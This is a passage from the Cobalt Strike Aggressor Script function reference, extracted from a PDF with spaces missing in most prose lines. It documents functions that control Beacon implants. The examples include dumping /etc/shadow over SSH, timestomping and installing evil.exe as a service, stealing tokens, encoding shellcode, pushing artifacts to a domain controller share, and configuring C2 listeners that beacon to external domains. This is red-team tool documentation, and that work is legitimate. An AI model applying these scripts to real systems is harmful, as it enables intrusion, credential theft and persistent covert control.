+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thehostofthecontroller
+$3-theportofthecontroller
+$4-afilewithposition-independentcodetoexecuteinatemporaryprocess.
+CobaltStrikeUserGuide www.fortra.com page:338
+
+AggressorScript/Functions
+Example
+bspunnel($1, "127.0.0.1", 4444, script_resource("agent.bin"));
+bspunnel_local
+SpawnandtunnelanagentthroughthisBeacon(viaatargetlocalhost-onlyreverseport
+forward).Note:thisreverseportforwardtunneltraversesthroughtheBeaconchaintotheteam
+serverand,viatheteamserver,outthroughtherequestingCobaltStrikeclient.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thehostofthecontroller
+$3-theportofthecontroller
+$4-afilewithposition-independentcodetoexecuteinatemporaryprocess.
+Example
+bspunnel_local($1, "127.0.0.1", 4444, script_resource("agent.bin"));
+bssh
+AskBeacontospawnanSSHsession.
+Arguments
+$1-idforthebeacon.ThismaybeanarrayorasingleID.
+$2-IPaddressorhostnameofthetarget
+$3-port(e.g.,22)
+$4-username
+$5-password
+$6-(optional)thePIDtoinjecttheSSHclientintoor$null
+CobaltStrikeUserGuide www.fortra.com page:339
+
+AggressorScript/Functions
+$7-(optional)thearchitectureofthetargetPID(x86|x64)or$null
+Example
+Spawnatemporaryprocess
+bssh($1, "172.16.20.128", 22, "root", "toor");
+Injectintothespecifiedprocess
+bssh($1, "172.16.20.128", 22, "root", "toor", 1234, "x64");
+bssh_key
+AskBeacontospawnanSSHsessionusingthedatafromakeyfile.Thekeyfileneedstobein
+thePEMformat.IfthefileisnotinthePEMformatthenmakeacopyofthefileandconvertthe
+copywiththefollowingcommand:
+/usr/bin/ssh-keygen -f [/path/to/copy] -e -m pem -p
+Arguments
+$1-idforthebeacon.ThismaybeanarrayorasingleID.
+$2-IPaddressorhostnameofthetarget
+$3-port(e.g.,22)
+$4-username
+$5-keydata(asastring)
+$6-(optional)thePIDtoinjecttheSSHclientintoor$null
+$7-(optional)thearchitectureofthetargetPID(x86|x64)or$null
+Example
+alias myssh {
+$pid = $2;
+$arch = $3;
+CobaltStrikeUserGuide www.fortra.com page:340
+
+AggressorScript/Functions
+$handle = openf("/path/to/key.pem");
+$keydata = readb($handle, -1);
+closef($handle);
+if ($pid >= 0 && ($arch eq "x86" || $arch eq "x64")) {
+bssh_key($1, "172.16.20.128", 22, "root", $keydata, $pid, $arch);
+} else {
+bssh_key($1, "172.16.20.128", 22, "root", $keydata);
+}
+};
+bstage
+REMOVED This function is removed in Cobalt Strike 4.0. Use &beacon_stage_tcp or
+&beacon_stage_pipe to explicitly stage a payload. Use &beacon_link to link to it.
+bsteal_token
+AskBeacontostealatokenfromaprocess.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thePIDtotakethetokenfrom
+Use: bsteal_token [pid]
+bsteal_token [pid]
+OpenProcessToken access mask suggested values:
+blank = default (TOKEN_ALL_ACCESS)
+0 = TOKEN_ALL_ACCESS
+11 = TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY (1+2+8)
+Access mask values:
+STANDARD_RIGHTS_REQUIRED . . . . : 983040
+TOKEN_ASSIGN_PRIMARY . . . . . . : 1
+TOKEN_DUPLICATE . . . . . . . . : 2
+TOKEN_IMPERSONATE . . . . . . . : 4
+TOKEN_QUERY . . . . . . . . . . : 8
+TOKEN_QUERY_SOURCE . . . . . . . : 16
+TOKEN_ADJUST_PRIVILEGES . . . . : 32
+TOKEN_ADJUST_GROUPS . . . . . . : 64
+TOKEN_ADJUST_DEFAULT . . . . . . : 128
+TOKEN_ADJUST_SESSIONID . . . . . : 256
+CobaltStrikeUserGuide www.fortra.com page:341
+
+AggressorScript/Functions
+NOTE:
+'OpenProcessTokenaccessmask'canbehelpfulforstealingtokensfromprocessesusing
+'SYSTEM'userandyouhavethiserror:Couldnotopenprocesstoken:{pid}(5)
+Youcansetyourpreferreddefaultwith'.steal_token_access_mask'intheMalleableC2global
+options.
+Example
+alias steal_token {
+bsteal_token($1, int($2));
+}
+bsudo
+AskBeacontorunacommandviasudo(SSHsessionsonly)
+Arguments
+$1-theidforthesession.ThismaybeanarrayorasingleID.
+$2-thepasswordforthecurrentuser
+$3-thecommandandargumentstorun
+Example
+# hashdump [password]
+ssh_alias hashdump {
+bsudo($1, $2, "cat /etc/shadow");
+}
+bsyscall_method
+AskBeacontochangeitssyscallmethod.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thesyscallmethod.Supportedmethodsare:
+CobaltStrikeUserGuide www.fortra.com page:342
+
+AggressorScript/Functions
+None:UsethestandardWindowsAPIfunction.
+Direct:UsetheNt*versionofthefunction.
+Indirect:JumptotheappropriateinstructionwithintheNt*versionofthefunction.
+NOTE:
+Ifthe$2argumentisempty,Beaconistaskedtoquerythecurrentlyusedsyscallmethod.
+Example
+alias syscall_method {
+bsyscall_method($1, $2);
+}
+btask
+ReportataskacknowledgementforaBeacon.Thistaskacknowledgementwillalsocontribute
+tothenarrativeinCobaltStrike'sActivityReportandSessionsReport.
+Arguments
+$1-theidforthebeacontopostto
+$2-thetexttopost
+$3-astringwithMITREATT&CKTacticIDs.UseacommaandaspacetospecifymultipleIDs
+inonestring.
+https://attack.mitre.org
+Example
+alias foo {
+btask($1, "User tasked beacon to foo", "T1015");
+}
+btimestomp
+AskBeacontochangethefilemodified/accessed/createdtimestomatchanotherfile.
+Arguments
+CobaltStrikeUserGuide www.fortra.com page:343
+
+AggressorScript/Functions
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thefiletoupdatetimestampvaluesfor
+$3-thefiletograbtimestampvaluesfrom
+Example
+alias persist {
+bcd($1, "c:\\windows\\system32");
+bupload($1, script_resource("evil.exe"));
+btimestomp($1, "evil.exe", "cmd.exe");
+bshell($1, 'sc create evil binpath= "c:\\windows\\system32\\evil.exe"');
+bshell($1, 'sc start evil');
+}
+btoken_store_remove
+AskBeacontoremovespecificaccesstokensfromthestore.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thearrayoftokenIDstoremove.
+Example
+alias token-store_remove {
+btoken_store_remove($1, @(int($2)));
+}
+btoken_store_remove_all
+AskBeacontoremovealltokensfromthestore.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+Example
+CobaltStrikeUserGuide www.fortra.com page:344
+
+AggressorScript/Functions
+alias token-store_remove_all {
+btoken_store_remove_all($1);
+}
+btoken_store_show
+AskBeacontoprintthetokenscurrentlyavailableinthetokenstore.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+Example
+alias token-store_show {
+btoken_store_show($1);
+}
+btoken_store_steal
+AskBeacontostealatokenandstoreitinthetokenstore.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thearrayofPIDstotakethetokensfrom.
+$3-theOpenProcessTokenaccessmask.
+Example
+alias token-store_steal {
+btoken_store_steal($1, @(int($2)), 11);
+}
+btoken_store_steal_and_use
+AskBeacontostealatoken,storeitandimmediatelyapplyittothebeacon.
+Arguments
+CobaltStrikeUserGuide www.fortra.com page:345
+
+AggressorScript/Functions
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thePIDtotakethetokenfrom.
+$3-theOpenProcessTokenaccessmask.
+Example
+alias token-store_steal_and_use {
+btoken_store_steal_and_use($1, int($2), 11);
+}
+btoken_store_use
+AskBeacontouseatokenfromthetokenstore.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thetokenID.
+Example
+alias token-store_use {
+btoken_store_use($1, int($2));
+}
+bunlink
+AskBeacontodelinkaBeaconitsconnectedtooveraTCPsocketornamedpipe.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thetargethosttounlink(specifiedasanIPaddress)
+$3-(optional)thePIDofthetargetsessiontounlink
+Example
+CobaltStrikeUserGuide www.fortra.com page:346
+
+AggressorScript/Functions
+bunlink($1, "172.16.48.3");
+bupload
+AskaBeacontouploadafile
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thelocalpathtothefiletoupload
+Example
+bupload($1, script_resource("evil.exe"));
+bupload_raw
+AskaBeacontouploadafile
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-theremotefilenameofthefile
+$3-therawcontentofthefile
+$4-(optional)thelocalpathtothefile(ifthereisone)
+Example
+$data = artifact("my listener", "exe");
+bupload_raw($1, "\\\\DC\\C$\\foo.exe", $data);
+bwdigest
+REMOVED Removed in Cobalt Strike 4.0. Use &bmimikatz directly.
+bwinrm
+CobaltStrikeUserGuide www.fortra.com page:347
+
+AggressorScript/Functions
+REMOVED Removed in Cobalt Strike 4.0. Use &bjump with winrm or winrm64 built-in
+options.
+bwmi
+REMOVED Removed in Cobalt Strike 4.0.
+call
+Issueacalltotheteamserver.
+Arguments
+$1-thecommandname
+$2-acallbacktoreceivearesponsetothisrequest.Thecallbackwillreceivetwoarguments.
+Thefirstisthecallname.Thesecondistheresponse.
+...-oneormoreargumentstopassintothiscall.
+Example
+call("aggressor.ping", { warn(@_); }, "this is my value");
+closeClient
+ClosethecurrentCobaltStriketeamserverconnection.
+Example
+closeClient();
+colorPanel
+GenerateaJavacomponenttosetaccentcolorswithinCobaltStrike'sdatamodel
+Arguments
+$1-theprefix
+CobaltStrikeUserGuide www.fortra.com page:348
+
+AggressorScript/Functions
+$2-anarrayofIDstochangecolorsfor
+Example
+popup targets {
+menu "&Color" {
+insert_component(colorPanel("targets", $1));
+}
+}
+Seealso
+&highlight
+credential_add
+Addacredentialtothedatamodel
+Arguments
+$1-username
+$2-password
+$3-realm
+$4-source
+$5-host
+Example
+command falsecreds {
+for ($x = 0; $x < 100; $x++) {
+credential_add("user $+ $x", "password $+ $x");
+}
+}
+credentials
+ReturnsalistofapplicationcredentialsinCobaltStrike'sdatamodel.
+CobaltStrikeUserGuide www.fortra.com page:349
+
+AggressorScript/Functions
+Returns
+Anarrayofdictionaryobjectswithinformationabouteachcredentialentry.
+Example
+printAll(credentials());
+custom_event
+BroadcastacustomeventtoallCobaltStrikeclients.
+Arguments
+$1-thetopicname
+$2-theeventdata
+Example
+custom_event("my-topic", %(foo => 42, bar => "hello"));
+custom_event_private
+SendacustomeventtoonespecificCobaltStrikeclient.
+Arguments
+$1-whotosendthecustomeventto
+$2-thetopicname
+$3-theeventdata
+Example
+custom_event_private("neo", "my-topic", 42);
+data_keys
+CobaltStrikeUserGuide www.fortra.com page:350
+
+AggressorScript/Functions
+Listthequery-ablekeysfromCobaltStrike'sdatamodel
+Returns
+Alistofkeysthatyoumayquerywith&data_query
+Example
+foreach $key (data_keys()) {
+println("\n\c4=== $key ===\n");
+println(data_query($key));
+}
+data_query
+QueriesCobaltStrike'sdatamodel
+Arguments
+$1-thekeytopullfromthedatamodel
+Returns
+ASleeprepresentationofthequerieddata.
+Example
+println(data_query("targets"));
+dbutton_action
+Addsanactionbuttontoa&dialog.Whenthisbuttonispressed,thedialogclosesandits
+callbackiscalled.Youmayaddmultiplebuttonstoadialog.CobaltStrikewilllinethesebuttons
+upinarowandcenterthematthebottomofthedialog.
+Arguments
+$1-the$dialogobject
+$2-thebuttonlabel
+CobaltStrikeUserGuide www.fortra.com page:351
+
+AggressorScript/Functions
+Example
+dbutton_action($dialog, "Start");
+dbutton_action($dialog, "Stop");
+dbutton_help
+AddsaHelpbuttontoa&dialog.Whenthisbuttonispressed,CobaltStrikewillopentheuser's
+browsertothespecifiedURL.
+Arguments
+$1-the$dialogobject
+$2-theURLtogoto
+Example
+dbutton_help($dialog, "http://www.google.com");
+dialog
+Createadialog.Use&dialog_showtoshowit.
+Arguments
+$1-thetitleofthedialog
+$2-a%dictionarymappingrownamestodefaultvalues
+$3-acallbackfunction.Calledwhentheuserpressesa&dbutton_actionbutton.$1isa
+referencetothedialog.$2isthebuttonname.$3isadictionarythatmapseachrow'snameto
+itsvalue.
+Returns
+Ascalarwitha$dialogobject.
+Example
+CobaltStrikeUserGuide www.fortra.com page:352
+
+AggressorScript/Functions
+sub callback {
+# prints: Pressed Go, a is: Apple
+println("Pressed $2 $+ , a is: " . $3['a']);
+}
+$dialog = dialog("Hello World", %(a => "Apple", b => "Bat"), &callback);
+drow_text($dialog, "a", "Fruit: ");
+drow_text($dialog, "b", "Rodent: ");
+dbutton_action($dialog, "Go");
+dialog_show($dialog);
+dialog_description
+Addsadescriptiontoa&dialog
+Arguments
+$1-a$dialogobject
+$2-thedescriptionofthisdialog
+Example
+dialog_description($dialog, "I am the Hello World dialog.");
+dialog_show
+Showsa&dialog.
+Arguments
+$1-the$dialogobject
+Example
+dialog_show($dialog);
+dispatch_event
+CallafunctioninJavaSwing'sEventDispatchThread.Java'sSwingLibraryisnotthreadsafe.
+AllchangestotheuserinterfaceshouldhappenfromtheEventDispatchThread.
+CobaltStrikeUserGuide www.fortra.com page:353
+
+AggressorScript/Functions
+Arguments
+$1-thefunctiontocall
+Example
+dispatch_event({
+println("Hello World");
+});
+downloads
+ReturnsalistofdownloadsinCobaltStrike'sdatamodel.
+Returns
+Anarrayofdictionaryobjectswithinformationabouteachdownloadedfile.
+Example
+printAll(downloads());
+drow_beacon
+Addsabeaconselectionrowtoa&dialog
+Arguments
+$1-a$dialogobject
+$2-thenameofthisrow
+$3-thelabelforthisrow
+Example
+drow_beacon($dialog, "bid", "Session: ");
+drow_checkbox
+CobaltStrikeUserGuide www.fortra.com page:354
+
+AggressorScript/Functions
+Addsacheckboxtoa&dialog
+Arguments
+$1-a$dialogobject
+$2-thenameofthisrow
+$3-thelabelforthisrow
+$4-thetextnexttothecheckbox
+Example
+drow_checkbox($dialog, "box", "Scary: ", "Check me... if you dare");
+drow_combobox
+Addsacomboboxtoa&dialog
+Arguments
+$1-a$dialogobject
+$2-thenameofthisrow
+$3-thelabelforthisrow
+$4-anarrayofoptionstochoosefrom
+Example
+drow_combobox($dialog, "combo", "Options", @("apple", "bat", "cat"));
+drow_exploits
+Addsaprivilegeescalationexploitselectionrowtoa&dialog
+Arguments
+$1-a$dialogobject
+CobaltStrikeUserGuide www.fortra.com page:355
+
+AggressorScript/Functions
+$2-thenameofthisrow
+$3-thelabelforthisrow
+Example
+drow_exploits($dialog, "exploit", "Exploit: ");
+drow_file
+Addsafilechooserrowtoa&dialog
+Arguments
+$1-a$dialogobject
+$2-thenameofthisrow
+$3-thelabelforthisrow
+Example
+drow_file($dialog, "file", "Choose: ");
+drow_interface
+AddsaVPNinterfaceselectionrowtoa&dialog
+Arguments
+$1-a$dialogobject
+$2-thenameofthisrow
+$3-thelabelforthisrow
+Example
+drow_interface($dialog, "int", "Interface: ");
+CobaltStrikeUserGuide www.fortra.com page:356
+
+AggressorScript/Functions
+drow_krbtgt
+Addsakrbtgtselectionrowtoa&dialog
+Arguments
+$1-a$dialogobject
+$2-thenameofthisrow
+$3-thelabelforthisrow
+Example
+drow_krbtgt($dialog, "hash", "krbtgt hash: ");
+drow_listener
+Addsalistenerselectionrowtoa&dialog.Thisrowonlyshowslistenerswithstagers(e.g.,
+windows/beacon_https/reverse_https).
+Arguments
+$1-a$dialogobject
+$2-thenameofthisrow
+$3-thelabelforthisrow
+Example
+drow_listener($dialog, "listener", "Listener: ");
+drow_listener_smb
+DEPRECATED This function is deprecated in Cobalt Strike 4.0. It's now equivalent to
+&drow_listener_stage
+drow_listener_stage
+CobaltStrikeUserGuide www.fortra.com page:357
+
+AggressorScript/Functions
+Addsalistenerselectionrowtoa&dialog.ThisrowshowsallBeaconandForeignlistener
+payloads.
+Arguments
+$1-a$dialogobject
+$2-thenameofthisrow
+$3-thelabelforthisrow
+Example
+drow_listener_stage($dialog, "listener", "Stage: ");
+drow_mailserver
+Addsamailserverfieldtoa&dialog.
+Arguments
+$1-a$dialogobject
+$2-thenameofthisrow
+$3-thelabelforthisrow
+Example
+drow_mailserver($dialog, "mail", "SMTP Server: ");
+drow_proxyserver
+DEPRECATED This function is deprecated in Cobalt Strike 4.0. The proxy configuration is
+now tied directly to the listener.
+Addsaproxyserverfieldtoa&dialog.
+Arguments
+$1-a$dialogobject
+CobaltStrikeUserGuide www.fortra.com page:358
+
+AggressorScript/Functions
+$2-thenameofthisrow
+$3-thelabelforthisrow
+Example
+drow_proxyserver($dialog, "proxy", "Proxy: ");
+drow_site
+Addsasite/URLfieldtoa&dialog.
+Arguments
+$1-a$dialogobject
+$2-thenameofthisrow
+$3-thelabelforthisrow
+Example
+drow_site($dialog, "url", "Site: ");
+drow_text
+Addsatextfieldrowtoa&dialog
+Arguments
+$1-a$dialogobject
+$2-thenameofthisrow
+$3-thelabelforthisrow
+$4-Optional.Thewidthofthistextfield(incharacters).Thisvalueisn'talwayshonored(it
+won'tshrinkthefield,butitwillmakeitwider).
+Example
+CobaltStrikeUserGuide www.fortra.com page:359
+
+AggressorScript/Functions
+drow_text($dialog, "name", "Name: ");
+drow_text_big
+Addsamulti-linetextfieldtoa&dialog
+Arguments
+$1-a$dialogobject
+$2-thenameofthisrow
+$3-thelabelforthisrow
+Example
+drow_text_big($dialog, "addr", "Address: ");
+dstamp
+Formatatimeintoadate/timevalue.Thisvalueincludesseconds.
+Arguments
+$1-thetime[millisecondssincetheUNIXepoch]
+Example
+println("The time is now: " . dstamp(ticks()));
+Seealso
+&tstamp
+elog
+Publishanotificationtotheeventlog
+Arguments
+CobaltStrikeUserGuide www.fortra.com page:360
+
+AggressorScript/Functions
+$1-themessage
+Example
+elog("The robot invasion has begun!");
+encode
+Obfuscateaposition-independentblobofcodewithanencoder.
+Arguments
+$1-positionindependentcode(e.g.,shellcode,"raw"stagelessBeacon)toapplyencoderto
+$2-theencodertouse
+$3-thearchitecture(e.g.,x86,x64)
+Encoder Description
+alpha Alphanumericencoder(x86-only)
+xor XOR encoder
+Notes
+l Theencodedposition-independentblobmustrunfrom amemorypagethathasRWX
+permissionsorthedecodestepwillcrashthecurrentprocess.
+l alpha encoder:TheEDIregistermustcontaintheaddressoftheencodedblob.
+&encodeprependsa10-byte(non-alphanumeric)program tothebeginningofthe
+alphanumericencodedblob.Thisprogram calculatesthelocationoftheencodedblob
+andsetsEDIforyou.IfyouplantosetEDIyourself,youmayremovethesefirst10bytes.
+Returns
+Aposition-independentblobthatdecodestheoriginalstringandpassesexecutiontoit.
+Example
+# generate shellcode for a listener
+$stager = shellcode("my listener", false "x86");
+CobaltStrikeUserGuide www.fortra.com page:361
+
+AggressorScript/Functions
+# encode it.
+$stager = encode($stager, "xor", "x86");
+extract_reflective_loader
+ExtracttheexecutablecodeforareflectiveloaderfromaBeaconObjectFile(BOF).
+Arguments
+$1-BeaconObjectFiledatathatcontainsareflectiveloader.
+Returns
+TheReflectiveLoaderbinaryexecutablecodeextractedfromtheBeaconObjectFiledata.
+Example
+SeeBEACON_RDLL_GENERATEhook
+# ---------------------------------------------------------------------
+# extract loader from BOF.
+# ---------------------------------------------------------------------
+$loader = extract_reflective_loader($data);
+file_browser
+OpentheFileBrowser.Thisfunctiondoesnothaveanyparameters.
+fireAlias
+Runsauser-definedalias
+Arguments
+$1-thebeaconidtorunthealiasagainst
+$2-thealiasnametorun
+$3-theargumentstopasstothealias.
+Example
+CobaltStrikeUserGuide www.fortra.com page:362
+
+AggressorScript/Functions
+# run the foo alias when a new Beacon comes in
+on beacon_initial {
+fireAlias($1, "foo", "bar!");
+}
+fireEvent
+Fireanevent.
+Arguments
+$1-theeventname
+...-theeventarguments.
+Example
+on foo {
+println("Argument is: $1");
+}
+fireEvent("foo", "Hello World!");
+format_size
+Formatsanumberintoasize(e.g.,1024=>1kb)
+Arguments
+$1-thesizetoformat
+Returns
+Astringrepresentingahumanreadabledatasize.
+Example
+println(format_size(1024));
+getAggressorClient
+CobaltStrikeUserGuide www.fortra.com page:363
+
+AggressorScript/Functions
+Returnstheaggressor.AggressorClientJavaobject.Thiscanreachanythinginternalwithinthe
+currentCobaltStrikeclientcontext.
+Example
+$client = getAggressorClient();
+gunzip
+Decompressastring(GZIP).
+Arguments
+$1-thestringtocompress
+Returns
+Theargumentprocessedbythegzipde-compressor
+Example
+println(gunzip(gzip("this is a test")));
+Seealso
+&gzip
+gzip
+GZIPastring.
+Arguments
+$1-thestringtocompress
+Returns
+Theargumentprocessedbythegzipcompressor
+Example
+CobaltStrikeUserGuide www.fortra.com page:364
+
+AggressorScript/Functions
+println(gzip("this is a test"));
+Seealso
+&gunzip
+highlight
+Insertanaccent(colorhighlight)intoCobaltStrike'sdatamodel
+Arguments
+$1-thedatamodel
+$2-anarrayofrowstohighlight
+$3-theaccenttype
+Notes
+l Datamodelrowsinclude:applications,beacons,credentials,listeners,services,and
+targets.
+l Accentoptionsare:
+Accent Color
+[empty] nohighlight
+good Green
+bad Red
+neutral Yellow
+ignore Grey
+cancel DarkBlue
+Example
+command admincreds {
+local('@creds');
+# find all of our creds that are user Administrator.
+foreach $entry (credentials()) {
+CobaltStrikeUserGuide www.fortra.com page:365
+
+AggressorScript/Functions
+if ($entry['user'] eq "Administrator") {
+push(@creds, $entry);
+}
+}
+# highlight all of them green!
+highlight("credentials", @creds, "good");
+}
+host_delete
+Deleteahostfromthetargetsmodel
+Arguments
+$1-theIPv4orIPv6addressofthistarget[youmayspecifyanarrayofhoststoo]
+Example
+# clear all hosts
+host_delete(hosts());
+host_info
+Getinformationaboutatarget.
+Arguments
+$1-thehostIPv4orIPv6address
+$2-[Optional]thekeytoextractavaluefor
+Returns
+%info = host_info("address");
+Returnsadictionarywithknowninformationaboutthistarget.
+$value = host_info("address", "key");
+Returnsthevalueforthespecifiedkeyfromthistarget'sentryinthedatamodel.
+CobaltStrikeUserGuide www.fortra.com page:366
+
+AggressorScript/Functions
+Example
+# create a script console alias to dump host info
+command host {
+println("Host $1");
+foreach $key => $value (host_info($1)) {
+println("$[15]key $value");
+}
+}
+host_update
+Addorupdateahostinthetargetsmodel
+Arguments
+$1-theIPv4orIPv6addressofthistarget[youmayspecifyanarrayofhoststoo]
+$2-theDNSnameofthistarget
+$3-thetarget'soperatingsystem
+$4-theoperatingsystemversionnumber(e.g.,10.0)
+$5-anoteforthetarget.
+Note
+Youmayspecifya$nullvalueforanyargumentand,ifthehostexists,nochangewillbemade
+tothatvalue.
+Example
+host_update("192.168.20.3", "DC", "Windows", 10.0);
+hosts
+ReturnsalistofIPaddressesfromCobaltStrike'stargetmodel
+Returns
+CobaltStrikeUserGuide www.fortra.com page:367
+
+AggressorScript/Functions
+AnarrayofIPaddresses
+Example
+printAll(hosts());
+insert_component
+Addajavax.swing.JComponentobjecttothemenutree
+Arguments
+$1-thecomponenttoadd
+insert_menu
+Bringmenusassociatedwithapopuphookintothecurrentmenutree.
+Arguments
+$1-thepopuphook
+...-additionalargumentsarepassedtothechildpopuphook.
+Example
+popup beacon {
+# menu definitions above this point
+insert_menu("beacon_bottom", $1);
+# menu definitions below this point
+}
+iprange
+GenerateanarrayofIPv4addressesbasedonastringdescription
+Arguments
+CobaltStrikeUserGuide www.fortra.com page:368
+
+AggressorScript/Functions
+$1-astringwithadescriptionofIPv4ranges
+Range Result
+192.168.1.2 TheIP4address192.168.1.2
+192.168.1.1,192.168.1.2 TheIPv4addresses192.168.1.1and192.168.1.2
+192.168.1.0/24 TheIPv4addresses192.168.1.0through192.168.1.255
+192.168.1.18-192.168.1.30 TheIPv4addresses192.168.1.18through192.168.1.29
+192.168.1.18-30 TheIPv4addresses192.168.1.18through192.168.1.29
+Returns
+AnarrayofIPv4addresseswithinthespecifiedranges.
+Example
+printAll(iprange("192.168.1.0/25"));
+keystrokes
+ReturnsalistofkeystrokesfromCobaltStrike'sdatamodel.
+Returns
+Anarrayofdictionaryobjectswithinformationaboutrecordedkeystrokes.
+Example
+printAll(keystrokes());
+licenseKey
+DEPRECATED This function is deprecated in Cobalt Strike 4.6. The function will now
+return an empty string.
+GetthelicensekeyforthisinstanceofCobaltStrike
+Returns
+CobaltStrikeUserGuide www.fortra.com page:369
+
+AggressorScript/Functions
+Yourlicensekey.
+Example
+println("Your key is: " . licenseKey());
+listener_create
+DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &listener_create_ext
+Createanewlistener.
+Arguments
+$1-thelistenername
+$2-thepayload(e.g.,windows/beacon_http/reverse_http)
+$3-thelistenerhost
+$4-thelistenerport
+$5-acommaseparatedlistofaddressesforlistenertobeaconto
+Example
+# create a foreign listener
+listener_create("My Metasploit", "windows/foreign_https/reverse_https",
+"ads.losenolove.com", 443);
+# create an HTTP Beacon listener
+listener_create("Beacon HTTP", "windows/beacon_http/reverse_http",
+"www.losenolove.com", 80,
+"www.losenolove.com, www2.losenolove.com");
+listener_create_ext
+Createanewlistener.
+Arguments
+$1-thelistenername
+CobaltStrikeUserGuide www.fortra.com page:370
+
+AggressorScript/Functions
+$2-thepayload(e.g.,windows/beacon_http/reverse_http)
+$3-amapwithkey/valuepairsthatspecifyoptionsforthelistener
+Note
+Thefollowingpayloadoptionsarevalidfor$2:
+Payload Type
+windows/beacon_dns/reverse_dns_txt BeaconDNS
+windows/beacon_http/reverse_http BeaconHTTP
+windows/beacon_https/reverse_https BeaconHTTPS
+windows/beacon_bind_pipe BeaconSMB
+windows/beacon_bind_tcp BeaconTCP
+windows/beacon_extc2 ExternalC2
+windows/foreign/reverse_http ForeignHTTP
+windows/foreign/reverse_https ForeignHTTPS
+Thefollowingkeysarevalidfor$3:
+Key DNS HTTP/S SMB TCP (Bind)
+althost HTTPHostHeader
+bindto bindport bindport
+beacons c2hosts c2hosts bindhost
+host staginghost staginghost
+maxretry maxretry maxretry
+port c2port c2port pipename port
+profile profilevariant
+proxy proxyconfig
+strategy hostrotation hostrotation
+ThefollowinghostrotationValuesarevalidforthe'strategy'Key:
+CobaltStrikeUserGuide www.fortra.com page:371
+
+AggressorScript/Functions
+Option
+round-robin
+random
+failover
+failover-5x
+failover-50x
+failover-100x
+failover-1m
+failover-5m
+failover-15m
+failover-30m
+failover-1h
+failover-3h
+failover-6h
+failover-12h
+failover-1d
+rotate-1m
+rotate-5m
+rotate-15m
+rotate-30m
+rotate-1h
+rotate-3h
+rotate-6h
+rotate-12h
+rotate-1d
+Note
+Themaxretryvalueusesthefollowingsyntaxofexit-[max_attempts]-[increase_attempts]-
+[duration][m,h,d].Forexample'exit-10-5-5m'willexitbeaconafter10failedattemptsandwill
+increasesleeptimeafter5failedattemptsto5minutes.Thesleeptimewillnotbeupdatedifthe
+currentsleeptimeisgreaterthanthespecifieddurationvalue.Thesleeptimewillbeaffectedby
+CobaltStrikeUserGuide www.fortra.com page:372
+
+AggressorScript/Functions
+thecurrentjittervalue.Onasuccessfulconnectionthefailedattemptscountwillberesetto
+zeroandthesleeptimewillberesettothepriorvalue.
+TheproxyconfigurationstringisthesamestringyouwouldinputintoCobaltStrike'slistener
+dialog.*direct*ignoresthelocalproxyconfigurationandattemptsadirectconnection.
+protocol://user:[email protected]:portspecifieswhichproxyconfigurationthe
+artifactshoulduse.Theusernameandpasswordareoptional(e.g.,
+protocol://host:portisfine).Theacceptableprotocolsaresocksandhttp.Setthe
+proxyconfigurationstringto$nullor""tousethedefaultbehavior.
+Example
+# create a foreign listener
+listener_create_ext("My Metasploit", "windows/foreign/reverse_https",
+%(host => "ads.losenolove.com", port => 443));
+# create an HTTP Beacon listener
+listener_create_ext("Beacon HTTP", "windows/beacon_http/reverse_http",
+%(host => "www.losenolove.com", port => 80,
+beacons => "www.losenolove.com, www2.losenolove.com"));
+# create an HTTP Beacon listener
+listener_create_ext("HTTP", "windows/beacon_http/reverse_http",
+%(host => "stage.host",
+profile => "default",
+port => 80,
+beacons => "b1.host,b2.host",
+althost => "alt.host",
+bindto => 8080,
+strategy => "failover-5x",
+max_retry => "exit-10-5-5m",
+proxy => "proxy.host"));
+listener_delete
+Stopandremovealistener.
+Arguments
+$1-thelistenername
+Example
+listener_delete("Beacon HTTP");
+CobaltStrikeUserGuide www.fortra.com page:373
+
+AggressorScript/Functions
+listener_describe
+Describealistener.
+Arguments
+$1-thelistenername
+$2-(optional)theremotetargetthelistenerisdestinedfor
+Returns
+Astringdescribingthelistener
+Example
+foreach $name (listeners()) {
+println("$name is: " . listener_describe($name));
+}
+listener_info
+Getinformationaboutalistener.
+Arguments
+$1-thelistenername
+$2-(optional)thekeytoextractavaluefor
+Returns
+%info = listener_info("listener name");
+Returnsadictionarywiththemetadataforthislistener.
+$value = listener_info("listener name", "key");
+Returnsthevalueforthespecifiedkeyfromthislistener'smetadata
+CobaltStrikeUserGuide www.fortra.com page:374
+
+AggressorScript/Functions
+Example
+# create a script console alias to dump listener info
+command dump {
+println("Listener $1");
+foreach $key => $value (listener_info($1)) {
+println("$[15]key $value");
+}
+}
+listener_pivot_create
+Createanewpivotlistener.
+Arguments
+$1-theBeaconID
+$2-thelistenername
+$3-thepayload(e.g.,windows/beacon_reverse_tcp)
+$4-thelistenerhost
+$5-thelistenerport
+Note
+Theonlyvalidpayloadargumentiswindows/beacon_reverse_tcp.
+Example
+# create a pivot listener:
+# $1 = beaconID, $2 = name, $3 = port
+alias plisten {
+local('$lhost $bid $name $port');
+# extract our arguments
+($bid, $name, $port) = @_;
+# get the name of our target
+$lhost = beacon_info($1, "computer");
+CobaltStrikeUserGuide www.fortra.com page:375
+
+AggressorScript/Functions
+btask($1, "create TCP listener on $lhost $+ : $+ $port");
+listener_pivot_create($1, $name, "windows/beacon_reverse_tcp", $lhost,
+$port);
+}
+listener_restart
+Restartalistener
+Arguments
+$1-thelistenername
+Example
+listener_restart("Beacon HTTP");
+listeners
+Returnalistoflistenernames(withstagersonly!)acrossallteamserversthisclientis
+connectedto.
+Returns
+Anarrayoflistenernames.
+Example
+printAll(listeners());
